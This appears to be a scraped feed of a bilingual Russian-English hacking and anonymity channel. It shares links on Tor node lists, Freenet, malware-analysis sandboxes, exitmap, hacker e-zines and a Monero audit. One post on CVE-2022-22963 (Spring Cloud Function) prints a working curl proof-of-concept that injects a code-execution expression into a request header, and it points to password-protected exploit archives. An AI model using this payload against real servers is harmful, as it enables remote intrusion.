|Tor-IP-Addresses|
🔎Постоянно обновляющийся список IP-адресов нод и exit-нод в луковой маршрутизации(TOR). Думаю, что найдёте применение(на худой конец может просто просканировать).
🔎A constantly updated list of node IP addresses and exit nodes in onion routing (TOR). I think that you will find an application (at worst, you can just scan it).
#tor #anonymity|Freenet Documentation|
Freenet заняла частичку моего сердца в списке анонимных p2p платформ.#anonymity #p2p #freenet
В официальной документации кратко и лаконично описывается процесс установки, подключения, объяснение работы и запуск внутри Freenet сайта(Freesite, как просто именуется ). Freenet децентрализован, что конечно, делает его более устойчивым к атакам. Конечно, как и любая другая p2p платформа, имеет шифрование коммуникации между узлами.
Подробнее можно почитать в документации и приложенных ниже документах(также есть презентация).
Freenet has taken a piece of my heart in the list of anonymous p2p platforms.
The official documentation briefly and concisely describes the process of installation, connection, explanation of operation and launch inside the Freenet site (Freesite, as it is simply called). Freenet is decentralized, which of course makes it more resistant to attacks. Of course, like any other p2p platform, it has encryption of communication between nodes.
You can read more in the documentation and attached documents below (there is also a presentation).
🔥2
Список сайтов и инструментов(буду пополнять, пока минимум, чтобы глаза не разбегались) для анализа файлов, ссылок и их идентификации
Самый популярный virustotal:🦠VT bot : @VirusTotalAV_bot
🦠VT multisandbox
🦠DrWeb
🦠DrWeb bot: @DrWebBot
🦠metadefender
🦠ESET scanner
🦠totalhash
🦠virusshare
🦠virusbay
🦠cuckoo
🦠website security check & malware scanner
🦠hybrid analysis
🦠Online Website Malware Scanner
🦠ISITPrhishing
🦠Comodo Malware Analysis Sandbox
🦠ANY.RUN(комьюнити версия - бесплатно)❤️
The list of sites and tools (I will replenish, at least for now, so that my eyes do not run away) for analyzing files, links and their identification
The most popular virustotal:🦠VT bot : @VirusTotalAV_bot
🦠VT multisandbox
🦠DrWeb
🦠DrWeb bot: @DrWebBot
🦠metadefender
🦠ESET scanner
🦠totalhash
🦠virusshare
🦠virusbay
🦠cuckoo(automated malware analysis)
🦠website security check & malware scanner
🦠hybrid analysis
🦠Online Website Malware Scanner
🦠ISITPrhishing
🦠Comodo Malware Analysis Sandbox
🦠ANY.RUN(Community version free)❤️
#malware
👍3
|CVE-2022-22963|
spring4shellFAQ
Spring4Shell scan
PoCApp
curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080 ′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’ http://192.168.1.2:8080/functionRouter ’
#cve #exploit
🔥Spring4Shell.rce 0-day exploit found-in spring cloud
💥CVSS:9.0
spring4shellFAQ
Spring4Shell scan
PoCApp
A critical security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.
Пока что от Spring нет готового патча, в качестве временной меры советуют понизить версию jdk.
Прикладываю архив от vx-underground ниже.
Ссылка на патч, который на данный момент разрабатывается.
So far, there is no ready-made patch from Spring, as a temporary measure, it is advised to downgrade the jdk version.
I attach the archive from vx-underground below.
Link to the patch , which is currently being developed.
The exploit is easy to execute using the curl command:CVE-2022-22963-main.zip
2.3 KB
vx-underground
пароль: infected
password: infectedpoc.py
1.7 KB
PoC Payload:
|exitmap|
В продолжение поста. Это сканер, написанный на питоне, с помощью которого можно получить больше информации о exit relays(torproject), в основном про их надёжность.
In continuation of the post. This is a scanner written in python, with which you can get more information about exit relays(torproject), mainly about their reliability.
#tor #anonymity|e-zines collection(wayback machine)|
Нашёл большой список электронных зинов(e-zines) хакерской тематики, есть как старые так, и относительно новые.
I found a large list of electronic zines (e-zines) of hacker topics, there are both old and relatively new ones.
#hacking #ezine👍1
|Monero Bulletproofs+ Security Audit|
Продолжу
#xmr #cryptocurrency
Продолжу
тему криптовалют.
Опять про монеро, только теперь про аудит безопасности системы проверки monero bulletproofs+, также можете почитать про monero bulletproofs.I will continue the topic of cryptocurrencies.
Again about Monroe, only now about the security audit of the monero bulletproofs+ verification system , you can also read about monero bulletproofs.#xmr #cryptocurrency